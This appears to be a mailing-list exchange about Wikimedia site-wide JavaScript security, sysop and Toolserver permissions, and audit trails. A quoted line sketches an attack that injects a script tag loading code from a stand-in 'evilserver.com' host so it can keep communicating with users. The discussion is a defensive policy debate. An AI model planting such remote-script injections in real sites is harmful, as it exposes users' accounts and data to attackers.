Gregory,
Domas, it seems you're out of touch with the actual current behavior.
ORLY :)
Right now anyone that can edit the site wide scripts can insert a document.write('<script src="http://evilserver.com... and the script loaded as a result of that can then have ongoing communication with the user by itself inserting more script tags, which call a a callback function with the result data.
"anyone that can edit" is: - limited to single project - elected by community - has an audit trail
please be reminded, that security consists of three holy As: - Authentication - Authorization - Audit
Though authentication to toolserver is very nice one (ssh keys, etc!), authorization has slightly too wide scope, and there's no change auditing. Sysops are authenticated via HTTP, are authorized to change single project, and all their actions are logged and monitored.
So you've made a case for limiting control of the proxy functionality to sysops... but not more than that.
You miss something.
Any sysop can. Any sysop can also edit the site wide, or throw a script into MediaWiki ns thus making it available withjs
project-wide. ltwiki sysop can't edit enwiki javascript. ltwiki toolserver user can affect enwiki.
And if you concern is "wikipedia account integrity" you're wrong to dismiss userscripts. Some are very very popular and are used by many accounts with elevated rights, for example: http://en.wikipedia.org/w/index.php?title=Special:Whatlinkshere/ User:Lupin/popups.js&limit=5000&from=0
This is where I'm happy to deny any kind of cooperation in case any problems happen.